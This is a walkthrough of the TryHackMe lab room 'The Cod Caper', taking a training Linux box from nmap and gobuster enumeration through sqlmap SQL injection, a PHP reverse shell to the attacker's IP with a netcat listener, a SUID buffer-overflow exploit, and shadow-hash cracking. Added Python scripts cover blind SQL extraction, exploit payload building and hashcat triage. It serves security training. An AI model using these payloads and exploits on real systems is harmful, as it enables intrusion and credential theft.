In this walkthrough we will be going through The Cod Caper room from TryHackMe. In this room, we will go through the journey of infiltrating and exploiting a Linux system. So without any delay, let’s get started.
Machine Info:
Title      | The Caping of Cod
IP address | 10.10.126.161
Difficulty | Easy
Objective  | A guided room taking you through infiltrating and exploiting a Linux system.
Task 1 – Intro
Task 2 – Host Enumeration
The first step is to see what ports and services are running on the target machine.
Recommended Tool – nmap:
Useful flags: -sS (TCP SYN scan, which needs root, hence the sudo), -sV (service and version detection), -sC (run the default NSE scripts).

```bash
wh1terose@fsociety:~$ sudo nmap -sS -sV -sC 10.10.126.161
Nmap scan report for 10.10.126.161
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA)
|   256 ff:89:32:98:f4:77:9c:09:39:f5:af:4a:4f:08:d6:f5 (ECDSA)
|_  256 89:92:63:e7:1d:2b:3a:af:6c:f9:39:56:5b:55:7e:f9 (ED25519)
-- snipped --
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
-- snipped --
```

Note that 53/tcp is reported as filtered, not open, so only two ports count as open.
Question 1 – How many ports are open on the target machine?
2
Question 2 – What is the http-title of the web server?
Apache2 Ubuntu Default Page: It works
Question 3 – What version is the ssh service?
OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Question 4 – What is the version of the web server?
Apache/2.4.18
Task 3 – Web Enumeration
Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available to access on the web server.
Recommended tool: gobuster
Useful flags: dir (directory brute-force mode), -u (target URL), -w (wordlist), -x (extensions to append to each word).

```bash
wh1terose@fsociety:~$ gobuster dir -u http://10.10.126.161/ -w ~/Desktop/Wordlist/big.txt -x php,txt,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.126.161/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
2023/05/09 22:00:07 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.txt        (Status: 403) [Size: 278]
/.htpasswd.php        (Status: 403) [Size: 278]
/.htaccess.html       (Status: 403) [Size: 278]
/.htpasswd.txt        (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess.php        (Status: 403) [Size: 278]
/.htpasswd.html       (Status: 403) [Size: 278]
/administrator.php    (Status: 200) [Size: 409]
Progress: 13592 / 81912 (16.59%)
```

The 403 hits on .htaccess/.htpasswd are Apache refusing access to its own config files and can be ignored; administrator.php is the only real find.
Question 1 – What is the name of the important file on the server?
administrator.php
Task 4 – Web Exploitation
The admin page gives us a login form. In situations like this it is always worth checking for “low-hanging fruit”, and in the case of login forms one of the first things to check for is SQL injection.
Recommended Tool: sqlmap
```bash
wh1terose@fsociety:~/Tools/sqlmap-dev$ python3 sqlmap.py -u http://10.10.126.161/administrator.php --forms --dump
[sqlmap banner: version 1.6.11.10#dev, https://sqlmap.org]

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:37:09 /2023-05-09/

[22:37:09] [INFO] testing connection to the target URL
[22:37:10] [INFO] searching for forms
[1/1] Form:
POST http://10.10.126.161/administrator.php
POST data: username=&password=
do you want to test this form? [Y/n/q] Y
Edit POST data [default: username=&password=] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n] Y
[22:38:23] [INFO] resuming back-end DBMS 'mysql'
[22:38:23] [INFO] using '/home/wh1terose/.sqlmap/output/results-05092023_1038pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=dYgw' RLIKE (SELECT (CASE WHEN (7626=7626) THEN 0x64596777 ELSE 0x28 END))-- YFJq&password=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=dYgw' OR (SELECT 3854 FROM(SELECT COUNT(*),CONCAT(0x71707a7a71,(SELECT (ELT(3854=3854,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TGXB&password=

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: username=dYgw' OR (SELECT 2064 FROM (SELECT(SLEEP(5)))ZgLa)-- YFbf&password=
---
do you want to exploit this SQL injection? [Y/n]
[22:39:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[22:39:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[22:39:07] [INFO] fetching current database
[22:39:07] [INFO] resumed: 'users'
[22:39:07] [INFO] fetching tables for database: 'users'
[22:39:08] [INFO] retrieved: 'users'
[22:39:08] [INFO] fetching columns for table 'users' in database 'users'
[22:39:09] [INFO] retrieved: 'username'
[22:39:09] [INFO] retrieved: 'varchar(100)'
[22:39:10] [INFO] retrieved: 'password'
[22:39:12] [INFO] retrieved: 'varchar(100)'
[22:39:12] [INFO] fetching entries for table 'users' in database 'users'
[22:39:12] [INFO] retrieved: 'secretpass'
[22:39:12] [INFO] retrieved: 'pingudad'
Database: users
Table: users
[1 entry]
+------------+----------+
| password   | username |
+------------+----------+
| secretpass | pingudad |
+------------+----------+

[22:39:12] [INFO] table 'users.users' dumped to CSV file '/home/wh1terose/.sqlmap/output/10.10.126.161/dump/users/users.csv'
[22:39:12] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/wh1terose/.sqlmap/output/results-05092023_1038pm.csv'

[*] ending @ 22:39:12 /2023-05-09/
```

The username parameter is injectable in three ways (boolean-based blind, error-based and time-based blind), and the dumped password column holds the password in plaintext rather than a hash, so the dump is immediately usable as a credential.
Question 1 – What is the admin username?
pingudad
Question 2 – What is the admin password?
secretpass
Question 3 – How many forms of SQLI is the form vulnerable to?
3
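To make the finding concrete, here is an added example (it is not part of the original walkthrough and not the room's PHP, which the page never shows) reproducing the login pattern that makes administrator.php injectable and the boolean-based blind technique that sqlmap listed first. It uses an in-memory SQLite table as a constructed stand-in for the target's MySQL users table, so the MySQL-specific RLIKE and FLOOR(RAND()) payloads are replaced by portable substr() probes; the bypass, the character-by-character extraction and the parameterised fix are the same idea on either engine.

```python
import sqlite3

# Candidate characters for blind extraction (enough for this password;
# widen it for real targets).
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def make_db():
    """Constructed stand-in for the target's 'users' database: one row,
    password stored in plaintext exactly as the sqlmap dump shows it."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('pingudad', 'secretpass')")
    return conn


def login_vulnerable(conn, username, password):
    """Assumed shape of the bug behind administrator.php: user input is
    spliced straight into the SQL text, so quotes in the input end the
    string literal and the rest becomes SQL."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn, username, password):
    """The fix: bound parameters. Input can only ever be data, never syntax."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def bypass_works(login):
    """Tautology bypass against a login function. True means the form can be
    passed without knowing any credentials at all."""
    return login(make_db(), "' OR 1=1-- ", "anything")


def blind_extract_password(conn, username, max_len=32):
    """Boolean-based blind extraction. Nothing is read from the response except
    'logged in or not'; each character is recovered with a yes/no question
    to the database. The trailing '-- ' comments out the original password
    check, the same trick sqlmap's payloads use."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            probe = "%s' AND substr(password,%d,1)='%s'-- " % (username, pos, ch)
            if login_vulnerable(conn, probe, "irrelevant"):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of password
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass on vulnerable login:", bypass_works(login_vulnerable))
    print("bypass on fixed login:     ", bypass_works(login_fixed))
    print("blind-extracted password:  ", blind_extract_password(db, "pingudad"))
```

Each extracted character costs one request per alphabet entry, which is why sqlmap takes a while even on a one-row table; the error-based and time-based variants it also found are just other ways of turning a query result into an observable yes/no.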
Task 5 – Command Execution
It seems we have gained the ability to run commands! Since this is my old PC, I should still have a user account! Let’s run a few test commands, and then try to gain access!
Method 1: nc Reverse shell:
This machine has been outfitted with nc, a tool that allows you to make and receive connections and send data. It is one of the most popular tools to get a reverse shell. Some great places to find reverse shell payloads are highoncoffee and Pentestmonkey.
After this you will have to do some additional enumeration to find pingu’s ssh key, or hidden password
Method 2: Hidden passwords:
Assuming my father hasn’t modified it since he took over my old PC, I should still have my hidden password stored somewhere. I don’t recall where though, so you’ll have to find it! find is the recommended tool here, as it allows you to search for the files a specific user owns.
The PHP one-liner below is what we submit through the command-execution page: it opens a TCP connection to our VPN address (10.18.11.103 in this run) on port 4444 and wires the stdin, stdout and stderr of an interactive /bin/sh to that socket (file descriptor 3, the first one the PHP process opens after the standard three). The netcat listener must already be running on our side before the payload is sent.

```bash
php -r '$sock=fsockopen("10.18.11.103",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
```

Listener on the attacking machine:

```bash
nc -lvnp 4444
```

The shell drops us into the web root. /etc/passwd shows two real login accounts (papa and pingu), and a find by file name turns up the hidden password (searching by owner, as the room suggests, gets there too):

```bash
wh1terose@fsociety:~/Tools/sqlmap-dev$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.126.161 36054
/bin/sh: 0: can't access tty; job control turned off
$ ls
2591c98b70119fe624898b1e424b5e91.php
administrator.php
index.html
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
papa:x:1000:1000:qaa:/home/papa:/bin/bash
mysql:x:108:116:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
pingu:x:1002:1002::/home/pingu:/bin/bash
$ find / -type f -name pass 2> /dev/null
/var/hidden/pass
$ cat /var/hidden/pass
pinguapingu
$
```

With pingu’s password in hand we can log in over SSH as pingu, which is the access the next task assumes.
Task 6 – LinEnum
LinEnum is a bash script that searches for possible ways to escalate privileges. It is incredibly popular due to the sheer number of methods it checks for, and LinEnum is often one of the first things to try once you have shell access.
Methods to get LinEnum onto the system
Method 1: SCP
Since you have SSH access to the machine you can use SCP to copy files over. In the case of LinEnum you would run scp {path to linenum} {user}@{host}:{path}. Example: scp /opt/LinEnum.sh {user}@{host}:/tmp would put LinEnum in /tmp.
Method 2: SimpleHTTPServer
SimpleHTTPServer is a Python module (python -m SimpleHTTPServer; on Python 3 the equivalent is python3 -m http.server) that hosts a basic web server on your host machine. Assuming the machine you compromised has a way to download files (wget or curl, for instance), you can host LinEnum and fetch it from there.
Note: There are numerous ways to do this and the two listed above are just my personal favorites.
Once you have LinEnum on the system, it is as simple as running it and reading through its output once it finishes. The section to look at here is the list of SUID binaries, which is where the interesting file turns up.
Question 1 – What is the path of the interesting SUID file?
/opt/secret/root
Task 7 – pwndbg
Luckily for us I was able to snag a copy of the source code from my dad’s flash drive
```c
#include "unistd.h"
#include "stdio.h"
#include "stdlib.h"

/* Never called by the program itself: it only runs if we redirect execution
   to it. It switches to uid/gid 1000 and prints the backed-up shadow file. */
void shell() {
    setuid(1000);
    setgid(1000);
    system("cat /var/backups/shadow.bak");
}

/* The bug: scanf("%s") has no length limit, so anything longer than the
   32-byte buffer overwrites what follows it on the stack, including the
   saved return address. */
void get_input() {
    char buffer[32];
    scanf("%s", buffer);
}

int main() {
    get_input();
}
```
The SUID file seems to expect 32 characters of input, and then immediately exits. This seems to warrant further investigation. Luckily I was practicing binary exploitation back when I was using that PC, so I have tools preinstalled to examine. One of those tools is pwndbg, a plugin for GDB which allows you to better examine binary files.
Run gdb /opt/secret/root and you should see the pwndbg banner and its prompt instead of plain gdb’s. This means that pwndbg has successfully been initialized. The next step is to test whether anything happens when you send more than 32 characters. To do this type r < <(cyclic 50), which runs the program with 50 characters of “cyclic” input on stdin.
Cyclic input looks like this: “aaaabaaacaaadaaaeaaaf…”. The sequence is built so that every 4-byte window is unique, which lets us work out exactly which part of the input ended up in a given register, for reasons you are about to see.
Once you run that command the program should crash with a SIGSEGV, and pwndbg’s register view will show EIP holding 0x6161616c, four bytes taken straight from the cyclic pattern.
Now this is where some knowledge of assembly helps. It seems that in this case we’re able to overwrite EIP, which is known as the instruction pointer. The instruction pointer tells the program which bit of memory to execute next, which in an ideal case would have the program run normally. However, since we’re able to overwrite it, we can theoretically execute any part of the program at any time.
Recall the shell function from the source code, if we can overwrite EIP to point to the shell function, we can cause it to execute. This is also where the benefits of cyclic input show themselves. Recall that cyclic input goes in 4 character/byte sequences, meaning we’re able to calculate exactly how many characters we need to provide before we can overwrite EIP.
Luckily cyclic provides this functionality with the -l flag: running cyclic -l {fault address} tells us exactly how many characters we need to provide before we overwrite EIP.
Running cyclic -l 0x6161616c outputs 44, meaning the 4 bytes after 44 characters of input land in EIP (0x6161616c is “laaa” in little-endian byte order, the 12th 4-byte chunk of the pattern).
That’s all we need for pre-exploitation!
Question 1 – Read the above 🙂
Done
Task 8 – Binary Exploitation: Manually
Question 1 – Woohoo!
Done
First we need the address of shell(), which gdb gives us directly:

```bash
(gdb) disassemble shell
Dump of assembler code for function shell:
   0x080484cb <+0>:     push   %ebp
   0x080484cc <+1>:     mov    %esp,%ebp
   0x080484ce <+3>:     sub    $0x8,%esp
   0x080484d1 <+6>:     sub    $0xc,%esp
   0x080484d4 <+9>:     push   $0x3e8
   0x080484d9 <+14>:    call   0x80483a0 <setuid@plt>
   0x080484de <+19>:    add    $0x10,%esp
   0x080484e1 <+22>:    sub    $0xc,%esp
   0x080484e4 <+25>:    push   $0x3e8
   0x080484e9 <+30>:    call   0x8048370 <setgid@plt>
   0x080484ee <+35>:    add    $0x10,%esp
   0x080484f1 <+38>:    sub    $0xc,%esp
   0x080484f4 <+41>:    push   $0x80485d0
   0x080484f9 <+46>:    call   0x8048380 <system@plt>
   0x080484fe <+51>:    add    $0x10,%esp
   0x08048501 <+54>:    nop
   0x08048502 <+55>:    leave
   0x08048503 <+56>:    ret
End of assembler dump.
```

shell() starts at 0x080484cb (the pushes of 0x3e8, i.e. 1000, are the setuid/setgid arguments from the source). With the 44-byte offset from the previous task, the exploit is 44 bytes of padding followed by that address in little-endian byte order, \xcb\x84\x04\x08. The one-liner below is Python 2 syntax (print statement, str as raw bytes) and is run on the target, where the SUID binary lives:

```bash
$ python -c 'print "A"*44 + "\xcb\x84\x04\x08"' | /opt/secret/root
root:$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:18277:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18277:0:99999:7:::
uuidd:*:18277:0:99999:7:::
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::
Segmentation fault
```

The shadow backup is printed and only then does the process crash: we never supplied a sensible return address for shell() itself, so its own ret jumps into garbage after the cat has already run.
Task 9 – Binary Exploitation: The pwntools way
Question 1 – Even more woohoo!
Done
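The pwntools route is what Task 7 and Task 9 describe; the page itself shows no script for it, so here is an added example (not the room's code and not pwntools itself) that re-implements the three pwntools calls the exploit needs, cyclic, cyclic_find and p32, in plain Python, so it runs without pwntools installed and makes clear why cyclic -l 0x6161616c gives 44. The shell() address 0x080484cb and the path /opt/secret/root are taken from the page; the scanf whitespace check is an added caveat; run_local only executes the binary when it is actually present, which it will not be anywhere but on the target.

```python
import itertools
import os
import struct
import subprocess

ALPHABET = "abcdefghijklmnopqrstuvwxyz"   # pwntools' default cyclic alphabet
SHELL_ADDR = 0x080484cb                   # shell() per `disassemble shell` above
BINARY = "/opt/secret/root"               # the SUID target on the box


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence B(k, n): every n-character window occurs
    exactly once, which is what lets one crash address map to one offset."""
    k = len(alphabet)
    a = [0] * k * n

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """Same bytes as pwntools' cyclic(length) with the default alphabet."""
    return "".join(itertools.islice(de_bruijn(ALPHABET, n), length)).encode()


def cyclic_find(value, n=4, search_len=0x10000):
    """Offset of a 4-byte window in the pattern, like `cyclic -l 0x6161616c`.
    An int is packed little-endian first, because that is how the bytes
    landed in EIP on this 32-bit x86 target."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    return cyclic(search_len, n).find(needle)


def p32(addr):
    """pwntools' p32: 32-bit little-endian packing."""
    return struct.pack("<I", addr)


def build_payload(offset, target_addr):
    """Padding up to the saved return address, then the address to jump to."""
    return b"A" * offset + p32(target_addr)


def scanf_safe(payload):
    """Caveat: the binary reads with scanf("%s"), which stops at whitespace and
    cannot carry a NUL byte. Any such byte inside the payload truncates it,
    so check before sending (the shell() address here happens to be clean)."""
    bad = {0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20}
    return not any(b in bad for b in payload)


def run_local(payload, binary=BINARY):
    """Feed the payload to the SUID binary on stdin (only meaningful on the
    target box). Returns its stdout, or None if the binary is not present."""
    if not os.path.exists(binary):
        return None
    return subprocess.run([binary], input=payload, capture_output=True).stdout


if __name__ == "__main__":
    offset = cyclic_find(0x6161616c)        # 44, as cyclic -l reported
    payload = build_payload(offset, SHELL_ADDR)
    assert scanf_safe(payload)
    print("offset:", offset, "payload:", payload)
    out = run_local(payload)
    print(out.decode(errors="replace") if out else "binary not present here")
```

With pwntools installed, the same script shrinks to `from pwn import *` plus `cyclic`, `cyclic_find`, `p32` and `process(BINARY).sendline(payload)`; the logic is identical, which is the point of writing it out once by hand.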
Task 10 – Finishing the job
Now that we have the password hashes, we can crack them and get the root password. Recall from the previous output that the root password hash is:

$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.

The $6$ prefix marks it as sha512crypt; the two fields after it are the salt (rFK4s/vE) and the digest. Hashcat supports cracking Linux password hashes (check its mode list for the right -m value), and rockyou.txt is a popular wordlist if you don’t already have it on your system.
Recommended tool – Hashcat:
Usage: hashcat {flags} {hashfile} {wordlist}
The run below uses John the Ripper instead, which recognises the format from the prefix on its own, reports the 5000-iteration cost, and cracks the hash from its bundled password.lst:
```bash
wh1terose@fsociety:~/CTF/TryHackme/The COD caper$ ~/Tools/john/run/john hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
love2fish        (?)
1g 0:00:00:14 DONE 2/3 (2023-05-09 23:41) 0.06868g/s 8158p/s 8158c/s 8158C/s 652652..ilovemel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Question 1 – What is the root password?
love2fish
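Before feeding a shadow dump to hashcat you have to pick the right mode per hash, and it pays to notice which accounts are crackable at all. The following is an added example, not part of the walkthrough, that does that triage: it parses shadow lines, maps the crypt(3) prefix to the hashcat -m value and iteration count (the numbers john printed), groups the hashes per mode, and, where the interpreter still has a crypt module (it was removed in Python 3.13), verifies a cracked candidate against the stored hash. The sample is constructed in the shape of the shadow.bak dump above: the root and papa hashes are the ones printed on this page, daemon is a locked account.

```python
import re

# Constructed sample in the shape of the shadow.bak dump above.
SAMPLE_SHADOW = """\
root:$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:18277:0:99999:7:::
daemon:*:17953:0:99999:7:::
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::
"""

# crypt(3) identifier -> (algorithm, hashcat -m mode, default iteration count)
HASH_TYPES = {
    "1": ("md5crypt", 500, 1000),
    "5": ("sha256crypt", 7400, 5000),
    "6": ("sha512crypt", 1800, 5000),
}

# $id$[rounds=N$]salt$digest, the modular crypt format used by glibc
CRYPT_RE = re.compile(
    r"^\$(?P<id>[^$]+)\$(?:rounds=(?P<rounds>\d+)\$)?(?P<salt>[^$]*)\$(?P<digest>[^$]+)$"
)


def parse_shadow_line(line):
    """Decode one /etc/shadow line. Returns None for accounts that cannot be
    cracked at all (empty, '*' or '!'-locked hash field)."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        return None
    user, field = fields[0], fields[1]
    if field == "" or field.startswith(("*", "!")):
        return None
    m = CRYPT_RE.match(field)
    if not m:
        return {"user": user, "algo": "unknown", "hashcat_mode": None,
                "salt": None, "rounds": None, "hash": field}
    algo, mode, default_rounds = HASH_TYPES.get(m.group("id"), ("unknown", None, None))
    rounds = int(m.group("rounds")) if m.group("rounds") else default_rounds
    return {"user": user, "algo": algo, "hashcat_mode": mode,
            "salt": m.group("salt"), "rounds": rounds, "hash": field}


def crackable_entries(shadow_text):
    """All accounts with a real hash, in file order."""
    entries = (parse_shadow_line(l) for l in shadow_text.splitlines())
    return [e for e in entries if e is not None]


def hashcat_inputs(entries):
    """hashcat takes one mode per run, so group 'user:hash' lines by -m value;
    each group is fed with --username so hashcat skips the user prefix."""
    groups = {}
    for e in entries:
        if e["hashcat_mode"] is not None:
            groups.setdefault(e["hashcat_mode"], []).append("%s:%s" % (e["user"], e["hash"]))
    return groups


def hashcat_command(mode, hashfile, wordlist):
    """The room's usage line, hashcat {flags} {hashfile} {wordlist}, filled in
    for a straight wordlist attack (-a 0) on a user:hash file."""
    return "hashcat -m %d -a 0 --username %s %s" % (mode, hashfile, wordlist)


def verify_candidate(entry, candidate):
    """Re-hash a cracked candidate with the system crypt(3), the function that
    produced the stored hash. Returns None when this Python has no crypt
    module or the libc does not support the algorithm."""
    try:
        import crypt
    except ImportError:
        return None
    setting = entry["hash"].rsplit("$", 1)[0] + "$"   # e.g. "$6$rFK4s/vE$"
    try:
        result = crypt.crypt(candidate, setting)
    except (OSError, ValueError):
        return None
    return None if result is None else result == entry["hash"]


if __name__ == "__main__":
    entries = crackable_entries(SAMPLE_SHADOW)
    for e in entries:
        print("%-6s %-12s hashcat -m %s  rounds=%s" % (e["user"], e["algo"], e["hashcat_mode"], e["rounds"]))
    for mode in hashcat_inputs(entries):
        print(hashcat_command(mode, "mode%d.txt" % mode, "rockyou.txt"))
    print("root:love2fish verifies as", verify_candidate(entries[0], "love2fish"))
```

The triage also makes the second finding in the dump visible: papa's hash is md5crypt ($1$, mode 500, 1000 iterations), which is far cheaper to attack than root's sha512crypt, so on a real engagement it would be the first one to throw at a wordlist.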
Task 11 – Thank you!
So that was “The Cod Caper” for you. In this room, we learned how to infiltrate and exploit a Linux system. We started with basic host enumeration with nmap, then performed directory bruteforcing and web enumeration with gobuster. Moving on, we exploited a SQL injection vulnerability and dumped the username and password combo. Further, we used the command execution that gave us to get our initial shell with netcat. For privilege escalation we used the LinEnum script to find the SUID binary, and finally looked into some binary exploitation with pwndbg, gdb and Pwntools. On that note, I will take my leave, but stay tuned for the next one and till then, remember to “Hack the planet”.